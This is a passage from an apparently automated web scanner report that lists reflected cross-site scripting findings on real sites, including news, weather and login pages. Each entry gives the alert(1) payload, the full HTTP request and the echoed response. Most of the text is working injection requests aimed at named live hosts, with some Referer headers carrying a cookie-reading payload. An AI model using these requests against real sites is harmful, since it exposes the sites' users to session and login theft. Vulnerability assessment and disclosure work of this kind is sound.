<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la ...[SNIP]... <input type="hidden" name="goto" value="http://eventful.com/?bbbef"><script>alert(1)</script>08098e07bd6=1" /> ...[SNIP]...
3.48. http://events.nydailynews.com/venues [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.nydailynews.com
Path: /venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc80"><script>alert(1)</script>2604110760d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?4fc80"><script>alert(1)</script>2604110760d=1 HTTP/1.1
Host: events.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/venues?4fc80"><script>alert(1)</script>2604110760d=1" /> ...[SNIP]...
3.49. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://faqs.ign.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28c9"><script>alert(1)</script>8c6b30f1fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f28c9"><script>alert(1)</script>8c6b30f1fbf=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!-- stitial !--> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... <a href="http://faqs.ign.com/?f28c9"><script>alert(1)</script>8c6b30f1fbf=1" class="prestitialText2"> ...[SNIP]...
3.50. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://faqs.ign.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d99e"-alert(1)-"5a4590f2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1d99e"-alert(1)-"5a4590f2531=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0aa8'-alert(1)-'9ed9ec26e4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydailynews/marketsd0aa8'-alert(1)-'9ed9ec26e4c HTTP/1.1
Host: finance.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:32:26 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 28 Feb 2011 13:32:26 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 16536
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/ ...[SNIP]... script=document.createElement('script'); script.type="text/javascript"; script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.nydailynews.com%2Fnydailynews%2Fmarketsd0aa8'-alert(1)-'9ed9ec26e4c%3FHTTP_HOST%3Dfinance.nydailynews.com%26HTTPS%3Doff&Type=page&Client=nydailynews&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.52. http://finance.nydailynews.com/nydailynews/markets [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://finance.nydailynews.com
Path: /nydailynews/markets
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4164'-alert(1)-'4231e0dc656 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydailynews/markets?f4164'-alert(1)-'4231e0dc656=1 HTTP/1.1
Host: finance.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:32:17 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 28 Feb 2011 13:32:17 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 41119
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/ ...[SNIP]... ="text/javascript"; script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.nydailynews.com%2Fnydailynews%2Fmarkets%3FHTTP_HOST%3Dfinance.nydailynews.com%26HTTPS%3Doff%26f4164'-alert(1)-'4231e0dc656%3D1&Type=page&Client=nydailynews&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.53. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hurricane.accuweather.com
Path: /hurricane/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9264"><script>alert(1)</script>f56711c46f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?e9264"><script>alert(1)</script>f56711c46f8=1 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Mon, 28 Feb 2011 13:37:21 GMT
Date: Mon, 28 Feb 2011 13:32:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?e9264"><script>alert(1)</script>f56711c46f8=1&unit=f"> ...[SNIP]...
3.54. https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://idcenter.services.optimum.net
Path: /Services/Process/ID/SignInByAccountNumber
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fc70"><script>alert(1)</script>1f54413b89f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Services/Process/ID/SignInByAccountNumber?2fc70"><script>alert(1)</script>1f54413b89f=1 HTTP/1.1
Host: idcenter.services.optimum.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ce4"%3balert(1)//8ecfa08801b was submitted in the mpck parameter. This input was echoed as 67ce4";alert(1)//8ecfa08801b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-3443-5%3Fmpt%3D467911467ce4"%3balert(1)//8ecfa08801b&mpt=4679114&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/f%3B235501499%3B0-0%3B2%3B46690141%3B3454-728/90%3B40433253/40451040/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=15017:3443/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:19:42 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT
ETag: "43e67e-bfe-49a4c7ee56f00"
Accept-Ranges: bytes
Content-Length: 5841
Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b03"%3balert(1)//04850f7d9e7 was submitted in the mpvc parameter. This input was echoed as 48b03";alert(1)//04850f7d9e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-3443-5%3Fmpt%3D4679114&mpt=4679114&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/f%3B235501499%3B0-0%3B2%3B46690141%3B3454-728/90%3B40433253/40451040/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f48b03"%3balert(1)//04850f7d9e7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=15017:3443/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:19:52 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT
ETag: "43e67e-bfe-49a4c7ee56f00"
Accept-Ranges: bytes
Content-Length: 5817
Content-Type: application/x-javascript
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b5c"%3balert(1)//ee926a3b294 was submitted in the mpck parameter. This input was echoed as a1b5c";alert(1)//ee926a3b294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/122387/336x280_new_owl_USA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-122387-13113-0%3Fmpt%3D4675442a1b5c"%3balert(1)//ee926a3b294&mpt=4675442&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/b%3B236454318%3B0-0%3B1%3B46690141%3B4252-336/280%3B40707159/40724946/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=15017:13113/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:19:38 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 16:27:00 GMT
ETag: "4ae122-bf6-49c042ae07d00"
Accept-Ranges: bytes
Content-Length: 5859
Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88336"%3balert(1)//79eacfeff02 was submitted in the mpvc parameter. This input was echoed as 88336";alert(1)//79eacfeff02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15017/122387/336x280_new_owl_USA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-122387-13113-0%3Fmpt%3D4675442&mpt=4675442&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3abc/3/0/%2a/b%3B236454318%3B0-0%3B1%3B46690141%3B4252-336/280%3B40707159/40724946/1%3B%3B%7Eaopt%3D2/0/26/0%3B%7Esscs%3D%3f88336"%3balert(1)//79eacfeff02 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=15017:13113/12309:25586/1551:17023/12525:37966/14960:18534
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:19:40 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 16:27:00 GMT
ETag: "4ae122-bf6-49c042ae07d00"
Accept-Ranges: bytes
Content-Length: 5835
Content-Type: application/x-javascript
3.59. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://isp.thelist.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8c34c--><script>alert(1)</script>e5c1c493f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8c34c--><script>alert(1)</script>e5c1c493f3c=1 HTTP/1.1
Host: isp.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:32:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:33:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 43615
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /?8c34c--><script>alert(1)</script>e5c1c493f3c=1 --> ...[SNIP]...
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload dd2c2<script>alert(1)</script>09c42f25639 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=757&ct=CSO_HP_ROSdd2c2<script>alert(1)</script>09c42f25639&tr=MARKETPLACE&num=3&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 12:46:08 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 28 Feb 2011 12:46:08 GMT
Content-Type: application/x-javascript
Content-Length: 81
// Error: Unknown old section CSO_HP_ROSdd2c2<script>alert(1)</script>09c42f25639
3.61. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b41f<script>alert(1)</script>1ee244d5308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACE&num=3&layt=1&fmt=simp&7b41f<script>alert(1)</script>1ee244d5308=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 12:46:09 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 28 Feb 2011 12:46:09 GMT
Content-Type: application/x-javascript
Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload e8385<script>alert(1)</script>9537fda7bc0 was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACEe8385<script>alert(1)</script>9537fda7bc0&num=3&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 28 Feb 2011 12:46:09 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 28 Feb 2011 12:46:09 GMT Content-Type: application/x-javascript Content-Length: 86
// Error: Site 757 has no section MARKETPLACEe8385<script>alert(1)</script>9537fda7bc0
3.63. https://login.openx.org/sso/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://login.openx.org
Path: /sso/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd3b"><script>alert(1)</script>817fa1e628f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sso/login?7bd3b"><script>alert(1)</script>817fa1e628f=1 HTTP/1.1 Host: login.openx.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 28 Feb 2011 13:32:29 GMT P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: JSESSIONID=0DE430F759ED88703184640BD42AC197.tomcat3; Path=/sso; Secure Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 5444 Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <form id="login-form" method="post" action="login;jsessionid=0DE430F759ED88703184640BD42AC197.tomcat3?7bd3b"><script>alert(1)</script>817fa1e628f=1"> ...[SNIP]...
3.64. http://michellemalkin.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://michellemalkin.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deaf9"><script>alert(1)</script>b1038fd8049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as deaf9\"><script>alert(1)</script>b1038fd8049 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?deaf9"><script>alert(1)</script>b1038fd8049=1 HTTP/1.1 Host: michellemalkin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:35 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding X-Pingback: http://michellemalkin.com/wp/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xf ...[SNIP]... <a href="/?deaf9\"><script>alert(1)</script>b1038fd8049=1&print=1"> ...[SNIP]...
3.65. http://nydailynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nydailynews.stats.com
Path: /fb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae06"><script>alert(1)</script>85366a59e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb/scoreboard.asp?cae06"><script>alert(1)</script>85366a59e58=1 HTTP/1.1 Host: nydailynews.stats.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Mon, 28 Feb 2011 13:32:40 GMT Content-Length: 12806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0ad"><script>alert(1)</script>6095da0146d was submitted in the REST URL parameter 5. This input was echoed as 6d0ad\"><script>alert(1)</script>6095da0146d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/688106d0ad"><script>alert(1)</script>6095da0146d/ HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 13:33:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:33:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 59978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/688106d0ad\"><script>alert(1)</script>6095da0146d/feed/" /> ...[SNIP]...
3.67. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e45"><script>alert(1)</script>f73dd9d85d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e45\"><script>alert(1)</script>f73dd9d85d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?60e45"><script>alert(1)</script>f73dd9d85d5=1 HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:33:04 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 111529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?60e45\"><script>alert(1)</script>f73dd9d85d5=1feed/" /> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d5c'-alert(1)-'bb8b0913587 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /play.html?code=19842;6812;5711;0&from=64d5c'-alert(1)-'bb8b0913587 HTTP/1.1 Host: optimized-by.simply.com Proxy-Connection: keep-alive Referer: http://www.googlebig.com/.../en-xss-guide-how-fix-xss-vulnerability-t-195.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
